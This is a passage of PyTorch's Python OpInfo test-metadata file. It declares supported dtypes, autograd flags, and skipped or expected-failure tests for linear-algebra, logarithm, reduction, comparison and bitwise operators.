DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.lstsq', aten_name='linalg_lstsq', variant_test_name='grad_oriented', # gradchecks for forward AD fails with multi-Tensor outputs op=lambda a, b, driver: torch.linalg.lstsq(a, b, driver=driver)[0], supports_out=False, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_lstsq, error_inputs_func=error_inputs_lstsq, supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # tests do not work with passing lambda for op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), # At this time ROCm uses magma instead of rocSolver, and the test passes DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', active_if=(not TEST_WITH_ROCM)), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', active_if=(not TEST_WITH_ROCM)), )), OpInfo('linalg.matrix_power', aliases=('matrix_power',), aten_name='linalg_matrix_power', dtypes=floating_and_complex_types(), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_matrix_power, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), OpInfo('linalg.multi_dot', # Need this lambda because gradcheck does not work with TensorList inputs aten_name='linalg_multi_dot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), supports_inplace_autograd=False, # Batched grad checks fail for empty input tensors (see https://github.com/pytorch/pytorch/issues/53407) check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_linalg_multi_dot, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples'), # Fails on XLA. # AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), # NB: linalg.norm has two variants so that different skips can be used for different sample inputs OpInfo('linalg.norm', op=torch.linalg.norm, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_norm, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! 
check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, aten_name='linalg_norm', skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), )), OpInfo('linalg.norm', op=torch.linalg.norm, variant_test_name='subgradients_at_zero', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=partial(sample_inputs_linalg_norm, variant='subgradient_at_zero'), aten_name='linalg_norm', supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, skips=( # [NEW] Skips specifically for sample inputs at zero # norm's vjp/jvp are not well-conditioned near zero DecorateInfo(unittest.expectedFailure, "TestGradients", 'test_fn_gradgrad'), DecorateInfo(unittest.expectedFailure, "TestGradients", 'test_fn_fwgrad_bwgrad') )), OpInfo('linalg.matrix_norm', aten_name='linalg_matrix_norm', dtypes=floating_and_complex_types(), check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_matrix_norm), OpInfo('linalg.qr', aten_name='linalg_qr', op=torch.linalg.qr, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # In-place ops check_batched_gradgrad=False, sample_inputs_func=sample_inputs_linalg_qr_geqrf, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.slogdet', aten_name='linalg_slogdet', op=torch.linalg.slogdet, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_slogdet, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack]), OpInfo('linalg.vander', aten_name='linalg_vander', ref=np_vander_batched, op=torch.linalg.vander, dtypes=all_types_and_complex(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_inputs_linalg_vander), ReductionOpInfo( 'linalg.vector_norm', op=torch.linalg.vector_norm, identity=0, nan_policy='propagate', supports_multiple_dims=True, complex_to_real=True, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! 
check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), generate_args_kwargs=sample_kwargs_vector_norm, aten_name='linalg_vector_norm', skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), )), UnaryUfuncInfo('log', ref=np.log, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16, torch.chalf), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 5e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), ), # log(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), UnaryUfuncInfo('log10', ref=np.log10, domain=(0, None), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), assert_autodiffed=True, dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), ), # log10(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), UnaryUfuncInfo('log1p', ref=np.log1p, aliases=('special.log1p',), domain=(-1, None), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 1e-1}),), skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), UnaryUfuncInfo('log2', ref=np.log2, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-1}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble]), ), # log2(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), BinaryUfuncInfo('ldexp', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_inplace_autograd=False, promotes_int_to_float=True, supports_out=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: mul(): functions with out=... 
arguments don't support # automatic differentiation, but one of the arguments requires grad # https://github.com/pytorch/pytorch/issues/68966 DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), ), decorators=[ DecorateInfo( toleranceOverride({ torch.complex64: tol(atol=1e-05, rtol=1e-05) }), 'TestCommon', device_type='cpu', ), ], ), OpInfo('logaddexp', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=lambda op_info, device, dtype, requires_grad=False, **kwargs: (SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),)),)), OpInfo('logaddexp2', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=lambda op_info, device, dtype, requires_grad=False, **kwargs: (SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),)),)), UnaryUfuncInfo('logical_not', ref=np.logical_not, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 5e-1}),), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, skips=( # The function variant always returns BoolTensor # while the inplace variant preserves the input dtype. 
# >>> t = torch.randn(3) # >>> torch.logical_not(t) # tensor([False, False, False]) # >>> torch.logical_not(t).dtype # torch.bool # >>> t.logical_not_().dtype # torch.float32 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_variant_consistency', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16)), )), BinaryUfuncInfo('lt', ref=np.less, aliases=('less',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('linalg.lu_factor', aten_name='linalg_lu_factor', op=torch.linalg.lu_factor, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.lu_factor_ex', aten_name='linalg_lu_factor_ex', op=torch.linalg.lu_factor_ex, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.lu', aten_name='linalg_lu', op=torch.linalg.lu, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('lu_unpack', op=torch.lu_unpack, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=(skipCPUIfNoLapack,), sample_inputs_func=sample_inputs_lu_unpack), OpInfo('lu', op=torch.lu, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # we skip jit tests because `lu` is a torch function # RuntimeError: # 'Tensor (inferred)' object has no attribute or method 'lu'.: # File "<string>", line 3 # def the_method(i0): # return i0.lu(True, True) # ~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # RuntimeError not raised: Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. 
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), )), OpInfo('lu_solve', op=torch.lu_solve, dtypes=floating_and_complex_types(), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_lu_solve, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Tests different backward implementations"), "TestCommon", "test_floating_inputs_are_differentiable"),), ), OpInfo('masked_fill', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_masked_fill, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, supports_out=False), OpInfo('masked_scatter', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_out=False), OpInfo('masked_select', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_masked_select, error_inputs_func=error_inputs_masked_select), OpInfo('matrix_exp', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), aliases=('linalg.matrix_exp',), sample_inputs_func=sample_inputs_matrix_exp, # Needs to construct a 2nx2n matrix by copy_ ing into it check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), # times out DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), supports_out=False, ), OpInfo('matmul', aliases=('linalg.matmul',), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, sample_inputs_func=sample_inputs_matmul, decorators=[ # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), # ROCm intermittently fails the test with standard atol/rtol DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-4, rtol=0)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda', active_if=TEST_WITH_ROCM), DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-4, rtol=0)}), 'TestCommon', 'test_out', 
device_type='cuda', active_if=TEST_WITH_ROCM), # mv for the sample with shapes (S, S, M, M), (M,) has some variance in the # backward on CPU DecorateInfo(toleranceOverride({torch.float32: tol(atol=0, rtol=1e-5)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu'), ], skips=( # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu', dtypes=(torch.long,)), # AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), OpInfo('max', variant_test_name='reduction_with_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_max_min_reduction_with_dim, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('max', variant_test_name='reduction_no_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_max_min_reduction_no_dim), OpInfo('median', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), # TODO: some signatures of median do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False)), OpInfo('nanmedian', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), # TODO: some signatures of nanmedian do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False)), OpInfo('var_mean', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False), backward_dtypes=floating_types_and(torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.half), # TODO: some signatures of var_mean do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=False, # Need: var_mean skips=( # var_mean does not support automatic differentiation for outputs with complex dtype DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # https://github.com/pytorch/pytorch/issues/67539 DecorateInfo(unittest.skip("67539"), 'TestCommon', 'test_noncontiguous_samples', active_if=TEST_WITH_ASAN, device_type='cpu'), # TODO: FIXME: complex inputs requiring grad error in forward DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), # TODO: review with var_mean tests in test_autograd.py DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Fails on ASAN!"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), # Division by zero, may be related to above? 
DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'))), OpInfo('std_mean', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False), backward_dtypes=floating_types_and(torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.half), # TODO: some signatures of std_mean do support out supports_out=False, supports_forward_ad=True, # Supports only certain variants? supports_fwgrad_bwgrad=False, # Need: std_mean skips=( DecorateInfo(unittest.skip("ASAN: division by zero!"), active_if=TEST_WITH_ASAN), # std_mean does not support forward when complex inputs require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # https://github.com/pytorch/pytorch/issues/67539 DecorateInfo(unittest.skip("67539"), 'TestCommon', 'test_noncontiguous_samples', active_if=TEST_WITH_ASAN, device_type='cpu'), # TODO: fix along with var_mean autograd tests DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Fails on ASAN!"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), # Division by zero, may be related to above? DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'))), OpInfo('meshgrid', variant_test_name='variadic_tensors', ref=np.meshgrid, dtypes=all_types_and_complex_and(torch.bfloat16, torch.bool, torch.float16), sample_inputs_func=partial(sample_inputs_meshgrid, variant='variadic'), skips=[ # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # meshgrid is defined in torch.functional to take a # variadic list of tensors. Variadic parameters are not # compatible with the normalize operator tests. DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Skip operator schema test because this is a functional and not an operator DecorateInfo(unittest.skip("Skipped!"), 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ], supports_out=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('meshgrid', variant_test_name='list_of_tensors', # Unlike the variant above, we do not use np.meshgrid as a # ref since it does not officially support list of numpy # arrays. dtypes=all_types_and_complex_and(torch.bfloat16, torch.bool, torch.float16), sample_inputs_func=partial(sample_inputs_meshgrid, variant='list'), skips=[ # meshgrid is defined in torch.functional to take a # variadic list of tensors. Variadic parameters are not # compatible with the normalize operator tests. 
DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), ], assert_autodiffed=True, supports_out=False, autodiff_nonfusible_nodes=[], supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('min', variant_test_name='reduction_with_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_max_min_reduction_with_dim, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('min', variant_test_name='reduction_no_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_max_min_reduction_no_dim), OpInfo('quantile', dtypes=floating_types(), sample_inputs_func=sample_inputs_reduction_quantile, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), # See https://github.com/pytorch/pytorch/issues/66357 # Relies on copy_ to broadcast, but the forward AD path calls broadcast_to which # does not have a batching rule in core check_batched_forward_grad=False), OpInfo('nanquantile', dtypes=floating_types(), sample_inputs_func=sample_inputs_reduction_quantile, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), # See https://github.com/pytorch/pytorch/issues/66357 # Relies on copy_ to broadcast, but the forward AD path calls broadcast_to which # does not have a batching rule in core check_batched_forward_grad=False), BinaryUfuncInfo( 'max', aliases=('maximum',), variant_test_name='binary', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, ref=np.maximum, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # TODO: FIXME: RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'maximum', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ref=np.maximum, supports_rhs_python_scalar=False, skips=( # TODO: FIXME: RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'min', aliases=('minimum',), variant_test_name='binary', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, ref=np.minimum, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # TODO: FIXME: RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'minimum', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), 
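# torch.minimum takes only Tensor arguments (no Python-scalar overload),
# which is why supports_rhs_python_scalar=False is set below.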
supports_forward_ad=True, supports_fwgrad_bwgrad=True, ref=np.minimum, supports_rhs_python_scalar=False, skips=( # TODO: FIXME: RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), ), ), BinaryUfuncInfo('logical_and', ref=np.logical_and, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('logical_or', ref=np.logical_or, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('logical_xor', ref=np.logical_xor, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('bitwise_and', ref=np.bitwise_and, dtypes=integral_types_and(torch.bool), operator_variant=operator.and_, inplace_operator_variant=operator.iand, supports_autograd=False, supports_one_python_scalar=True, skips=( # RuntimeError: "bitwise_and_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('bitwise_or', ref=np.bitwise_or, dtypes=integral_types_and(torch.bool), operator_variant=operator.or_, inplace_operator_variant=operator.ior, supports_autograd=False, supports_one_python_scalar=True, skips=( # TODO: FIXME: RuntimeError: "bitwise_or_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('bitwise_xor', ref=np.bitwise_xor, dtypes=integral_types_and(torch.bool), operator_variant=operator.xor, inplace_operator_variant=operator.ixor, supports_autograd=False, supports_one_python_scalar=True, skips=( # TODO: FIXME: RuntimeError: "bitwise_xor_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('heaviside', ref=lambda a, b: ( # necessary because np.heaviside incorrectly returns float64 when passed args of dtype int64 np.int64(np.heaviside(a, b)) if a.dtype == np.int64 and b.dtype == np.int64 else np.heaviside(a, b) ), dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), supports_autograd=False, supports_rhs_python_scalar=False, skips=( # RuntimeError: heaviside is not yet implemented for tensors with different dtypes. 
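# Illustrative repro of the mixed-dtype restriction stated above (a sketch):
# >>> torch.heaviside(torch.zeros(3), torch.tensor(1., dtype=torch.float64))
# RuntimeError: heaviside is not yet implemented for tensors with different dtypes.
# The type promotion test mixes dtypes by design, hence the expected failure.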
